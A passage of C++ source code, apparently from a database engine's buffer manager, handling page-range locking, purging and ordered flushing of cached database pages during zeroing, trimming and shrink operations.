else
{
pbfUndoInfo = pbf;
}
Assert( ( pbfVersion != pbf ) == !!fVersionLatched );
Assert( pbfUndoInfo != pbfNil );
Assert( ( pbfUndoInfo == pbf ) || ( pbfUndoInfo == pbfVersion ) );
g_critBFDepend.Leave();
fInCritDepend = fFalse;
// Now that we are guaranteed to have a write latch, check to see if
// we still have undo info to log and remove.
if ( pbfUndoInfo->prceUndoInfoNext != prceNil )
{
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbfUndoInfo ) );
while ( pbfUndoInfo->prceUndoInfoNext != prceNil )
{
Expected( pbfUndoInfo->err == JET_errSuccess );
if ( pbfUndoInfo->err < JET_errSuccess )
{
Error( pbfUndoInfo->err );
}
Assert( pbfUndoInfo->err == JET_errSuccess );
Assert( pbfUndoInfo->bfdf >= bfdfDirty );
// Note that we need to make sure that the undo-info LRs logged below
// are written out of the log buffer into the log file before proceeding
// with the zeroing/trimming/shrinkage of the range. This is accomplished
// by ErrBFLockPageRangeForExternalZeroing, which happens before the actual
// zeroing/trimming/shrinkage operation.
LGPOS lgpos;
Call( ErrLGUndoInfo( pbfUndoInfo->prceUndoInfoNext, &lgpos ) );
// Remove this undo info from the BF.
BFIRemoveUndoInfo( pbfUndoInfo, pbfUndoInfo->prceUndoInfoNext, lgpos );
}
}
// Unlatch if older version.
if ( pbfVersion != pbf )
{
pbfVersion->sxwl.ReleaseWriteLatch();
fVersionLatched = fFalse;
}
g_critBFDepend.Enter();
fInCritDepend = fTrue;
}
g_critBFDepend.Leave();
fInCritDepend = fFalse;
BFWriteUnlatch( &bfl );
fLatched = fFalse;
}
HandleError:
Assert( !( ( fVersionLatched || fInCritDepend ) && !fLatched ) );
Assert( !( fVersionLatched && fLatched ) || ( pbf != pbfVersion ) );
if ( fInCritDepend )
{
g_critBFDepend.Leave();
fInCritDepend = fFalse;
}
if ( fVersionLatched )
{
Assert( pbfVersion != pbfNil );
pbfVersion->sxwl.ReleaseWriteLatch();
fVersionLatched = fFalse;
}
if ( fLatched )
{
Assert( pbf != pbfNil );
Assert( PbfBFILatchContext( bfl.dwContext ) == pbf );
BFWriteUnlatch( &bfl );
fLatched = fFalse;
}
return err;
}
CPG CpgBFGetOptimalLockPageRangeSizeForExternalZeroing( const IFMP ifmp )
{
// Perform external zeroing in chunks to avoid latching too many pages at once.
// Preferably, use the extension size, though limit it to at most 10% of the current cache size
// and at least the write I/O size.
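// Worked example (hypothetical numbers): with a 1,000,000-page cache, a 256-page extension
// size and a 64-page max coalesced write, this yields max( min( 256, 100,000 ), 64, 1 ) = 256
// pages per locked chunk.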
ULONG_PTR cpgCacheSize = 0;
CallS( ErrBFGetCacheSize( &cpgCacheSize ) );
CPG cpgOptimalSize = (CPG)UlpFunctionalMin( UlParam( PinstFromIfmp( ifmp ), JET_paramDbExtensionSize ), cpgCacheSize / 10 );
cpgOptimalSize = LFunctionalMax( cpgOptimalSize, g_rgfmp[ifmp].CpgOfCb( UlParam( JET_paramMaxCoalesceWriteSize ) ) );
cpgOptimalSize = LFunctionalMax( cpgOptimalSize, 1 );
return cpgOptimalSize;
}
ERR ErrBFLockPageRangeForExternalZeroing( const IFMP ifmp, const PGNO pgnoFirst, const CPG cpg, const BOOL fTrimming, const TraceContext& tc, _Out_ DWORD_PTR* const pdwContext )
{
ERR err = JET_errSuccess;
BFIPageRangeLock* pbfprl = NULL;
FMP* const pfmp = &g_rgfmp[ ifmp ];
Assert( pdwContext != NULL );
Assert( pgnoFirst >= PgnoOfOffset( cpgDBReserved * g_rgcbPageSize[ g_icbCacheMax ] ) );
Assert( cpg > 0 );
// In the current implementation, trying to quiesce the waypoint when we're running trim
// will lead to a rank violation (we hold the DB root space latch throughout the process).
// Therefore, we effectively cannot support LLR with trim at this time: we skip waypoint
// quiescing when running trim, so allowing it would risk a corrupted database if we crashed at the wrong time.
if ( pfmp->FLogOn() )
{
const BOOL fWaypointLatency = UlParam( pfmp->Pinst(), JET_paramWaypointLatency ) > 0;
if ( fTrimming && fWaypointLatency )
{
Expected( fFalse ); // Already protected in ErrSPITrimRegion().
Error( ErrERRCheck( JET_errFeatureNotAvailable ) );
}
// Write out log buffers and flush the log. This makes sure that we don't proceed with the
// zeroing/trimming/shrinkage operation (which don't hold back the checkpoint) without making
// sure that the LRs associated with it are persisted and will be replayed in case of a crash.
// It also makes sure that the undo-info LRs logged in ErrBFPreparePageRangeForExternalZeroing
// make it to persisted storage.
Call( ErrBFIWriteLog( ifmp, fTrue ) );
Call( ErrBFIFlushLog( ifmp, iofrLogFlushAll, fTrue ) );
// Trimming a page range is equivalent to writing out (zero'ed) buffers for those pages, so make sure
// all pre-images to updates to those pages are written out.
if ( g_rgfmp[ ifmp ].FRBSOn() )
{
Call( pfmp->PRBS()->ErrFlushAll() );
}
// Quiesce LLR (we hit a rank violation when doing this under trim).
if ( !fTrimming )
{
Call( pfmp->FShrinkIsRunning() ? ErrFaultInjection( 50954 ) : JET_errSuccess );
Call( pfmp->Pinst()->m_plog->ErrLGQuiesceWaypointLatencyIFMP( ifmp ) );
Call( pfmp->FShrinkIsRunning() ? ErrFaultInjection( 47882 ) : JET_errSuccess );
}
}
// Allocate/initialize context.
Alloc( pbfprl = new BFIPageRangeLock );
pbfprl->ifmp = ifmp;
pbfprl->pgnoFirst = pgnoFirst;
pbfprl->pgnoLast = pgnoFirst + cpg - 1;
pbfprl->pgnoDbLast = pfmp->PgnoLast();
pbfprl->cpg = cpg;
Alloc( pbfprl->rgbfl = new BFLatch[ cpg ] );
memset( pbfprl->rgbfl, 0, cpg * sizeof(BFLatch) );
Alloc( pbfprl->rgfLatched = new BOOL[ cpg ] );
memset( pbfprl->rgfLatched, 0, cpg * sizeof(BOOL) );
Alloc( pbfprl->rgfUncached = new BOOL[ cpg ] );
memset( pbfprl->rgfUncached, 0, cpg * sizeof(BOOL) );
// The range being locked for external zeroing is expected to either be entirely owned by the
// databse (database trim) or entirely not owned by it (database shrink or truncation of unused
// space at attach).
Expected( ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoFirst > pbfprl->pgnoDbLast ) );
// First, latch all pages.
// We are only going to force a latch on an uncached page if the page is within the owned size
// of the database because in that case the page is technically reachable so we want to make sure
// we completely lock out potential readers. We do this to save unnecessary memory consumption and
// CPU in latching too many pages in cases where doing so is not needed.
for ( PGNO pgno = pbfprl->pgnoFirst; pgno <= pbfprl->pgnoLast; pgno++ )
{
const size_t ipgno = pgno - pbfprl->pgnoFirst;
BOOL fCachedNewPage = fFalse;
const BOOL fWithinOwnedDbSize = ( pgno <= pbfprl->pgnoDbLast );
const BFLatchFlags bflfUncachedBehavior = fWithinOwnedDbSize ? bflfNewIfUncached : bflfNoUncached;
Expected( !!fWithinOwnedDbSize == !!fTrimming );
err = ErrBFILatchPage(
&pbfprl->rgbfl[ ipgno ],
pbfprl->ifmp,
pgno,
BFLatchFlags( bflfUncachedBehavior | bflfNoTouch | bflfNoFaultFail | bflfUninitPageOk | bflfLatchAbandoned ),
bfltWrite,
BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 /* should not matter - NewIfUncached */ ),
tc,
&fCachedNewPage );
if ( err == errBFPageNotCached )
{
Assert( bflfUncachedBehavior == bflfNoUncached );
pbfprl->rgfLatched[ ipgno ] = fFalse;
pbfprl->rgfUncached[ ipgno ] = fTrue;
err = JET_errSuccess;
}
else
{
Call( err );
Assert( !fCachedNewPage || ( bflfUncachedBehavior == bflfNewIfUncached ) );
pbfprl->rgfLatched[ ipgno ] = fTrue;
pbfprl->rgfUncached[ ipgno ] = fCachedNewPage;
err = JET_errSuccess;
BF* const pbf = PBF( pbfprl->rgbfl[ ipgno ].dwContext );
Assert( pbf->sxwl.FOwnWriteLatch() );
pbf->fAbandoned = fTrue;
// If the page is uncached (and therefore was latched as a new page above), clobber it in memory
// as an empty (zeroed out) page. This is necessary because we may lose the lock later when purging pages and
// we don't want a page hanging around in an unknown state in the cache.
if ( pbfprl->rgfUncached[ ipgno ] )
{
Assert( pbf->bfdf == bfdfClean );
memset( pbf->pv, 0, g_rgcbPageSize[ pbf->icbBuffer ] );
pbf->err = SHORT( ErrERRCheck( JET_errPageNotInitialized ) );
}
}
}
OnDebug( const PGNO pgnoDbLastPostLatches = pfmp->PgnoLast() );
Expected( pgnoDbLastPostLatches >= pbfprl->pgnoDbLast );
// If the database grew, the range we are zeroing must be completely below the initial size,
// otherwise, we might have missed latching pages.
Assert( ( pgnoDbLastPostLatches <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
// Then, acquire range locks.
while ( !pbfprl->fRangeLocked )
{
err = pfmp->ErrRangeLockAndEnter( pbfprl->pgnoFirst, pbfprl->pgnoLast, &pbfprl->irangelock );
// Retry if too busy.
if ( err == JET_errTooManyActiveUsers )
{
UtilSleep( dtickFastRetry );
}
else
{
Call( err );
pbfprl->fRangeLocked = fTrue;
}
}
// Fixup flush map.
Call( pfmp->PFlushMap()->ErrSyncRangeInvalidateFlushType( pbfprl->pgnoFirst, pbfprl->cpg ) );
OnDebug( const PGNO pgnoDbLastPostRangeLock = pfmp->PgnoLast() );
Expected( pgnoDbLastPostRangeLock >= pbfprl->pgnoDbLast );
Assert( ( pgnoDbLastPostRangeLock <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
HandleError:
if ( err < JET_errSuccess )
{
BFUnlockPageRangeForExternalZeroing( (DWORD_PTR)pbfprl, tc );
*pdwContext = (DWORD_PTR)NULL;
}
else
{
*pdwContext = (DWORD_PTR)pbfprl;
}
return err;
}
void BFPurgeLockedPageRangeForExternalZeroing( const DWORD_PTR dwContext, const TraceContext& tc )
{
BFIPageRangeLock* const pbfprl = (BFIPageRangeLock*)dwContext;
Assert( ( pbfprl != NULL ) && ( pbfprl->rgbfl != NULL ) && ( pbfprl->rgfLatched != NULL ) && ( pbfprl->rgfUncached != NULL ) );
Assert( pbfprl->fRangeLocked );
OnDebug( const PGNO pgnoDbLastPrePurges = g_rgfmp[ pbfprl->ifmp ].PgnoLast() );
Expected( pgnoDbLastPrePurges >= pbfprl->pgnoDbLast );
// If the database grew, the range we are zeroing must be completely below the initial size,
// otherwise, we might have missed latching pages.
Assert( ( pgnoDbLastPrePurges <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
for ( PGNO pgno = pbfprl->pgnoFirst; pgno <= pbfprl->pgnoLast; pgno++ )
{
const size_t ipgno = pgno - pbfprl->pgnoFirst;
Assert( !!FBFInCache( pbfprl->ifmp, pgno ) == !!pbfprl->rgfLatched[ ipgno ] );
if ( !pbfprl->rgfLatched[ ipgno ] )
{
Assert( pgno > g_rgfmp[ pbfprl->ifmp ].PgnoLast() );
continue;
}
BF* const pbf = PBF( pbfprl->rgbfl[ ipgno ].dwContext );
const IFMP ifmp = pbf->ifmp;
Assert( pbf->sxwl.FOwnWriteLatch() );
// If the page is currently clean, clobber it in memory as an empty (zeroed out)
// page. This is necessary because we may lose the lock later when purging pages and
// we don't want a page hanging around in an unknown or divergent (from disk) state in the cache.
if ( pbf->bfdf == bfdfClean )
{
memset( pbf->pv, 0, g_rgcbPageSize[ pbf->icbBuffer ] );
pbf->err = SHORT( ErrERRCheck( JET_errPageNotInitialized ) );
}
BFIPurgeAllPageVersions( &pbfprl->rgbfl[ ipgno ], tc );
pbfprl->rgfLatched[ ipgno ] = fFalse;
}
OnDebug( const PGNO pgnoDbLastPostPurges = g_rgfmp[ pbfprl->ifmp ].PgnoLast() );
Expected( pgnoDbLastPostPurges >= pbfprl->pgnoDbLast );
Assert( ( pgnoDbLastPostPurges <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
}
void BFUnlockPageRangeForExternalZeroing( const DWORD_PTR dwContext, const TraceContext& tc )
{
BFIPageRangeLock* const pbfprl = (BFIPageRangeLock*)dwContext;
// Early failures when locking the range.
if ( ( pbfprl == NULL ) || ( pbfprl->rgbfl == NULL ) || ( pbfprl->rgfLatched == NULL ) || ( pbfprl->rgfUncached == NULL ) )
{
goto HandleError;
}
FMP* const pfmp = &g_rgfmp[ pbfprl->ifmp ];
// Rollback range locks if needed.
if ( pbfprl->fRangeLocked )
{
pfmp->RangeUnlockAndLeave( pbfprl->pgnoFirst, pbfprl->pgnoLast, pbfprl->irangelock );
pbfprl->fRangeLocked = fFalse;
}
// Rollback page latches if needed.
for ( PGNO pgno = pbfprl->pgnoFirst; pgno <= pbfprl->pgnoLast; pgno++ )
{
const size_t ipgno = pgno - pbfprl->pgnoFirst;
if ( !pbfprl->rgfLatched[ ipgno ] )
{
continue;
}
BF* const pbf = PBF( pbfprl->rgbfl[ ipgno ].dwContext );
Assert( pbf->sxwl.FOwnWriteLatch() );
if ( pbfprl->rgfUncached[ ipgno ] )
{
BFIPurgeAllPageVersions( &pbfprl->rgbfl[ ipgno ], tc );
}
else
{
BFWriteUnlatch( &pbfprl->rgbfl[ ipgno ] );
}
pbfprl->rgfLatched[ ipgno ] = fFalse;
}
HandleError:
delete pbfprl;
}
void BFPurge( IFMP ifmp, PGNO pgno, CPG cpg )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
PGNO pgnoFirst = ( pgnoNull == pgno ) ? PgnoOfOffset( cpgDBReserved * g_rgcbPageSize[g_icbCacheMax] ) : pgno;
PGNO pgnoLast = ( pgnoNull == pgno ) ? PgnoOfOffset( 0 ) : ( pgno + cpg - 1 );
BOOL fUnlock = fFalse;
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfPurge|sysosrtlContextFmp, pfmp, &ifmp, sizeof(ifmp) );
// quiesce all writes to the specified range of this IFMP via a range lock
//
// NOTE: on an OOM error, we will just skip this as it is an optional step
// designed to help minimize our writes during an error shutdown
if ( pfmp->ErrRangeLock( pgnoFirst, pgnoLast ) >= JET_errSuccess )
{
fUnlock = fTrue;
}
const TICK tickStartPurge = TickOSTimeCurrent();
// evict all cached pages for this IFMP in the range
// why aren't we able to make progress on purging these buffers yet? leaked latch?
// we should not be taking more than 5 minutes to be done.
Expected( DtickDelta( tickStartPurge, TickOSTimeCurrent() ) <= 5 * 60 * 1000 );
// scan through all initialized BFs looking for cached pages from this
// IFMP
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
const PBF pbf = PbfBFICacheIbf( ibf );
volatile BF* const pbfT = pbf;
const IFMP ifmpT = pbfT->ifmp;
const PGNO pgnoT = pbfT->pgno;
// if this BF doesn't contain a cached page from this IFMP within
// the given range, skip it now
if ( ifmpT != ifmp || pgnoT < pgnoFirst || pgnoT > pgnoLast )
{
continue;
}
BFIPurgePage( pbf, ifmpT, pgnoT, bfltMax, BFEvictFlags( bfefReasonPurgeContext | bfefEvictDirty | bfefAllowTearDownClean ) );
}
// we are purging all pages in the IFMP
if ( pgnoNull == pgno )
{
// we have an existing BF FMP Context
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp )
{
// test to see if the existing OB0 Index is empty
BOOL fEmpty = fTrue;
BFOB0::CLock lockOB0;
pbffmp->bfob0.MoveBeforeFirst( &lockOB0 );
fEmpty = fEmpty && pbffmp->bfob0.ErrMoveNext( &lockOB0 ) == BFOB0::ERR::errNoCurrentEntry;
pbffmp->bfob0.UnlockKeyPtr( &lockOB0 );
pbffmp->critbfob0ol.Enter();
fEmpty = fEmpty && pbffmp->bfob0ol.FEmpty();
pbffmp->critbfob0ol.Leave();
// we should be empty
Enforce( fEmpty );
// delete our context
pbffmp->bfob0.Term();
pbffmp->BFFMPContext::~BFFMPContext();
OSMemoryHeapFreeAlign( pbffmp );
pfmp->SetDwBFContext( NULL );
}
pfmp->LeaveBFContextAsWriter();
}
// release our range lock
if ( fUnlock )
{
pfmp->RangeUnlock( pgnoFirst, pgnoLast );
}
// wait here until we are sure we are done referencing this FMP or its INST by
// background threads. Remember there are many global background threads like
// scavenge pages / LRU-K, idle flush, or shrink ... not just the inst tied
// checkpoint advancement. We must do this in BFPurge because we may still have
// dirty buffers if this any of (A) a JET_bitTermDirty term, (B) this is a temp
// database ... though there may be mitigations here or (C) if a previous call
// to ErrBFFlush failed / same as termdirty / "error" term.
(void)CBFIssueList::ErrSync();
// wait for non-BF async IO's to complete
pfmp->WaitForAsyncIOForViewCache();
}
BOOL CmpPgno( __in const PGNO& pgno1, __in const PGNO& pgno2 )
{
return pgno1 < pgno2;
}
LOCAL BOOL CmpPgnoPbf( const PGNOPBF& pgnopbf1, const PGNOPBF& pgnopbf2 )
{
return CmpPgno( pgnopbf1.pgno, pgnopbf2.pgno );
}
CAutoResetSignal g_asigBFFlush( CSyncBasicInfo( "g_asigBFFlush" ) );
void BFIPreFlushOrdered( __in const IFMP ifmp, __in const PGNO pgnoFirst, __in const PGNO pgnoLast )
{
LOG * plog = PinstFromIfmp( ifmp )->m_plog;
// tracking variables
ULONG cFlushCycles = 0;
DWORD_PTR cbfFalseHits = 0;
DWORD_PTR cbfRemainingDependencies = 0;
DWORD_PTR cbfPageTouchTooRecent = 0;
DWORD_PTR cbfOutOfMemory = 0;
DWORD_PTR cbfLatchConflict = 0;
DWORD_PTR cbfAbandoned = 0;
DWORD_PTR cbfOtherErr = 0;
// Allocate a working array of buffers + pgnos ...
PGNOPBF * rgpgnopbf = NULL;
LONG_PTR cbfOrderedFlushMax = cbfInit;
LONG_PTR cbfOrderedFlushMac = 0;
while( NULL == ( rgpgnopbf = new PGNOPBF[ cbfOrderedFlushMax ] ) )
{
cbfOrderedFlushMax = cbfOrderedFlushMax / 2;
if ( cbfOrderedFlushMax < 10 )
{
return;
}
}
// attempt to pre-flush the log
// this is to reduce chances of (log flush or LLR) dependency hang-ups in our
// orderly flushing plan.
if ( NULL != plog && !plog->FLogDisabled() )
{
(void)plog->ErrLGUpdateWaypointIFMP( PinstFromIfmp( ifmp )->m_pfsapi, ifmp );
}
// Pre-flush the snapshot so no buffer remains ineligible to flush because of its pre-image
// not being flushed yet.
if ( g_rgfmp[ ifmp ].FRBSOn() )
{
(void)g_rgfmp[ ifmp ].PRBS()->ErrFlushAll();
}
(void)ErrBFIWriteLog( ifmp, fTrue );
// scan through all initialized BFs looking for cached pages from this IFMP
CBFIssueList bfil;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// if this BF doesn't contain a cached page from this IFMP, skip it now
if ( pbf->ifmp != ifmp )
{
continue;
}
// page range check
if ( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) )
{
continue;
}
if ( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) )
{
continue;
}
// enter the pgno+pbf into the working array ...
if ( cbfOrderedFlushMac >= cbfOrderedFlushMax )
{
break; // Ran out of space, let's call that good enough.
}
// it might seem like we can just store only the pbf (and we might be able
// to?), but this would be kind of dangerous to sort() as we have no locks
// so pbf->pgno could change in the middle of the sort() call.
rgpgnopbf[cbfOrderedFlushMac].pgno = pbf->pgno;
rgpgnopbf[cbfOrderedFlushMac].pbf = pbf;
cbfOrderedFlushMac++;
}
// now order all the relevant BFs by offset (i.e. pgno)
std::sort( rgpgnopbf, rgpgnopbf + cbfOrderedFlushMac, CmpPgnoPbf );
// finally let all the BFs file out of the theatre in an orderly manner ...
INT ipgnopbf = 0;
while( ipgnopbf < cbfOrderedFlushMac )
{
// flush out a batch of BFs / pages in order ...
for ( ; ipgnopbf < cbfOrderedFlushMac; ipgnopbf++ )
{
// we re-check that it contains a cached page from this IFMP within the page range, as the sort might've taken a while
if ( rgpgnopbf[ipgnopbf].pbf->ifmp != ifmp )
{
cbfFalseHits++;
continue;
}
if ( ( pgnoFirst != pgnoNull ) && ( rgpgnopbf[ipgnopbf].pbf->pgno < pgnoFirst ) )
{
cbfFalseHits++;
continue;
}
if ( ( pgnoLast != pgnoNull ) && ( rgpgnopbf[ipgnopbf].pbf->pgno > pgnoLast ) )
{
cbfFalseHits++;
continue;
}
const ERR errFlush = ErrBFIFlushPage( rgpgnopbf[ipgnopbf].pbf, IOR( iorpBFDatabaseFlush ), QosOSFileFromUrgentLevel( qosIODispatchUrgentBackgroundLevelMax / 2 ) );
OSTrace( JET_tracetagBufferManager, OSFormat( "\t[%d]OrderedFlush( %d:%d ) -> %d\n", ipgnopbf, (ULONG)rgpgnopbf[ipgnopbf].pbf->ifmp, (UINT)rgpgnopbf[ipgnopbf].pbf->pgno, errFlush ) );
if ( JET_errSuccess == errFlush ||
errBFIPageFlushed == errFlush ||
errBFIPageFlushPending == errFlush ||
errBFIPageFlushPendingSlowIO == errFlush ||
errBFIPageFlushPendingHungIO == errFlush )
{
// success, get new page ...
//
}
else if ( errDiskTilt == errFlush )
{
// take a breather ...
//
break;
}
// accumulate statistics of other issues ...
else if ( errBFIRemainingDependencies == errFlush ) cbfRemainingDependencies++;
else if ( errBFIPageTouchTooRecent == errFlush ) cbfPageTouchTooRecent++;
else if ( JET_errOutOfMemory == errFlush ) cbfOutOfMemory++;
else if ( errBFLatchConflict == errFlush ) cbfLatchConflict++;
else if ( errBFIPageAbandoned == errFlush ) cbfAbandoned++;
else cbfOtherErr++;
Assert( errBFIPageFlushDisallowedOnIOThread != errFlush );
Assert( wrnBFPageFlushPending != errFlush );
// note: errBFIPageFlushPending[HungIO] could sometimes hide a -256 I think ... should we
// handle that? Letting it go for now ...
}
// now issue, and wait a bit
CallS( bfil.ErrIssue( fTrue ) );
// this retry is pretty hard ... we may have to back off this sleep a little bit
(VOID)g_asigBFFlush.FWait( dtickFastRetry );
cFlushCycles++;
OSTrace( JET_tracetagBufferManager, OSFormat( " OrderlyFlush( %d ) taking a breather!\n", (ULONG)ifmp ) );
}
OSTrace( JET_tracetagBufferManager, OSFormat( "BF: Orderly flush complete for IFMP = %I32u: cbf = %I32u, cFlushCycles = %I32u, cbfFalseHits = %I32u, errors { %I32u, %I32u, %I32u, %I32u, %I32u, %I32u }",
(ULONG)ifmp, (ULONG)cbfOrderedFlushMac, (ULONG)cFlushCycles, (ULONG)cbfFalseHits,
(ULONG)cbfRemainingDependencies, (ULONG)cbfPageTouchTooRecent, (ULONG)cbfOutOfMemory, (ULONG)cbfLatchConflict, (ULONG)cbfAbandoned, (ULONG)cbfOtherErr ) );
delete[] rgpgnopbf;
}
ERR ErrBFFlush( IFMP ifmp, const OBJID objidFDP, const PGNO pgnoFirst, const PGNO pgnoLast )
{
// retry the flush until we have flushed as much of this IFMP as possible
ERR err = JET_errSuccess;
BOOL fRetryFlush = fFalse;
LONG cRetryFlush = 0;
Expected( ( pgnoFirst == pgnoNull ) == ( pgnoLast == pgnoNull ) );
Expected( ( objidFDP == objidNil ) || ( ( pgnoFirst == pgnoNull ) && ( pgnoLast == pgnoNull ) ) );
// for debuggability, in case we get stuck looping below
DWORD_PTR cTooManyOutstandingIOs = 0;
DWORD_PTR cRemainingDependencies = 0;
DWORD_PTR cPagesBeingFlushed = 0;
DWORD_PTR cPageFlushesPending = 0;
DWORD_PTR cLatchConflicts = 0;
DWORD_PTR cPageTouchesTooRecent = 0;
DWORD_PTR cPageFlushesDisallowed = 0;
DWORD_PTR cPagesAbandoned = 0;
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfFlushBegin|sysosrtlContextFmp, &g_rgfmp[ifmp], &ifmp, sizeof(ifmp) );
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "cBFPagesFlushedContextFlush before force-flush: %d [ifmp=0x%x]",
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.GetInstance( PinstFromIfmp( ifmp ) ) ),
ifmp ) );
// we have an optimized version that flushes an FMP's pages in pgno order for a more
// efficient flushing experience.
if ( objidNil == objidFDP && ( g_rgfmp[ ifmp ].Pfapi() == NULL || g_rgfmp[ ifmp ].FSeekPenalty() ) )
{
BFIPreFlushOrdered( ifmp, pgnoFirst, pgnoLast );
}
do {
CBFIssueList bfil;
DWORD_PTR cPageTouchesTooRecentThisRetry = 0;
fRetryFlush = fFalse;
// scan through all initialized BFs looking for cached pages from this
// IFMP
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// if this BF doesn't contain a cached page from this IFMP, skip it now
if ( pbf->ifmp != ifmp )
{
continue;
}
// page range check
if ( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) )
{
continue;
}
if ( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) )
{
continue;
}
// if we're only flushing pages from a specific btree of this IFMP,
// skip any that don't match
if ( objidNil != objidFDP )
{
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireSharedLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
const BOOL fSkip = ( objidFDP != ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP );
pbf->sxwl.ReleaseSharedLatch();
if ( fSkip )
{
continue;
}
}
else
{
// couldn't latch page to check objidFDP, so be
// conservative and DON'T skip this page
//
}
}
// possibly async flush this page
const ERR errFlush = ErrBFIFlushPage( pbf, IOR( iorpBFDatabaseFlush ), QosOSFileFromUrgentLevel( qosIODispatchUrgentBackgroundLevelMax / 2 ) );
OSTrace( JET_tracetagBufferManager, OSFormat( "\t[%d]CleanupFlush( %d:%d ) -> %d\n", (ULONG)ibf, (ULONG)pbf->ifmp, pbf->pgno, errFlush ) );
// there was an error flushing this BF
if ( errFlush < JET_errSuccess )
{
// this BF still has dependencies
if ( errFlush == errBFIRemainingDependencies )
{
// we will need to retry the flush
cRemainingDependencies++;
fRetryFlush = fTrue;
}
// a BF (not necessarily this BF) is being written
//
// NOTE: this can be caused by this BF being flushed or
// by another BF being flushed in its behalf (say for
// removing a flush-order dependency)
else if ( errFlush == errBFIPageFlushed )
{
// we will need to retry the flush to check for
// completion of the write
cPagesBeingFlushed++;
fRetryFlush = fTrue;
}
// a BF (not necessarily this BF) is still being written
else if ( ( errFlush == errBFIPageFlushPending ) || ( errFlush == errBFIPageFlushPendingSlowIO ) || ( errFlush == errBFIPageFlushPendingHungIO ) )
{
// we will need to retry the flush to check for
// completion of the write
cPageFlushesPending++;
fRetryFlush = fTrue;
}
// too much outstanding IO going on
else if ( errFlush == errDiskTilt )
{
// we will need to retry the flush later
cTooManyOutstandingIOs++;
fRetryFlush = fTrue;
cRetryFlush = 0; // interesting we reset this if we fill the disk IO queue ...
break;
}
// there was a latch conflict that prevented us from
// flushing this page
else if ( errFlush == errBFLatchConflict )
{
// we will need to try again later to check this page
cLatchConflicts++;
fRetryFlush = fTrue;
}
else if ( errFlush == errBFIPageTouchTooRecent )
{
// we need to try again after the log rolls, to allow this page to disk
cPageTouchesTooRecent++;
cPageTouchesTooRecentThisRetry++;
fRetryFlush = fTrue;
}
else if ( errFlush == errBFIPageFlushDisallowedOnIOThread )
{
// we shouldn't see this in ErrBFFlush
AssertSz( fFalse, "Shouldn't see errBFIPageFlushDisallowedOnIOThread in " __FUNCTION__ );
cPageFlushesDisallowed++;
fRetryFlush = fTrue;
}
else if ( errFlush == errBFIPageAbandoned )
{
// we need to wait until codepaths that abandon pages are done with them
cPagesAbandoned++;
fRetryFlush = fTrue;
}
// there was some other error
else
{
// save this error if we are not already failing
err = err < JET_errSuccess ? err : errFlush;
}
}
}
// we are going to retry the flush
if ( fRetryFlush )
{
LOG * plog = PinstFromIfmp( ifmp )->m_plog;
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "cBFPagesFlushedContextFlush before retry force-flush: %d [ifmp=0x%x]\r\n"
" cRetryFlush = %d\r\n"
" cTooManyOutstandingIOs = %Iu\r\n"
" cRemainingDependencies = %Iu\r\n"
" cPagesBeingFlushed = %Iu\r\n"
" cPageFlushesPending = %Iu\r\n"
" cLatchConflicts = %Iu\r\n"
" cPageFlushesDisallowed = %Iu\r\n"
" cPageTouchesTooRecent = %Iu\r\n"
" cPageTouchesTooRecentThisRetry = %Iu\r\n"
" cPagesAbandoned = %Iu",
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.GetInstance( PinstFromIfmp( ifmp ) ) ),
ifmp,
cRetryFlush,
cTooManyOutstandingIOs,
cRemainingDependencies,
cPagesBeingFlushed,
cPageFlushesPending,
cLatchConflicts,
cPageFlushesDisallowed,
cPageTouchesTooRecent,
cPageTouchesTooRecentThisRetry,
cPagesAbandoned ) );
// issue any queued writes and log flushes, synchronously if possible
CallS( bfil.ErrIssue( fTrue ) );
// get the waypoint updated so we can flush more buffers
if ( 0 != cPageTouchesTooRecentThisRetry )
{
if ( NULL != plog && !plog->FLogDisabled() )
{
(void)plog->ErrLGUpdateWaypointIFMP( PinstFromIfmp( ifmp )->m_pfsapi, ifmp );
}
// Pre-flush the snapshot so no buffer remains ineligible to flush because of its pre-image
// not being flushed yet.
if ( g_rgfmp[ ifmp ].FRBSOn() )
{
(void)g_rgfmp[ ifmp ].PRBS()->ErrFlushAll();
}
}
// sleep to attempt to resolve outstanding writes and wait for the
// resolution of dependencies based on real time events
(VOID)g_asigBFFlush.FWait( dtickFastRetry );
cRetryFlush++;
}
Assert( bfil.FEmpty() );
}
while ( fRetryFlush );
const ERR errBfFlushLoop = err;
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "cBFPagesFlushedContextFlush after force-flush: %d [ifmp=0x%x]\r\n"
" cRetryFlush = %d\r\n"
" cTooManyOutstandingIOs = %Iu\r\n"
" cRemainingDependencies = %Iu\r\n"
" cPagesBeingFlushed = %Iu\r\n"
" cPageFlushesPending = %Iu\r\n"
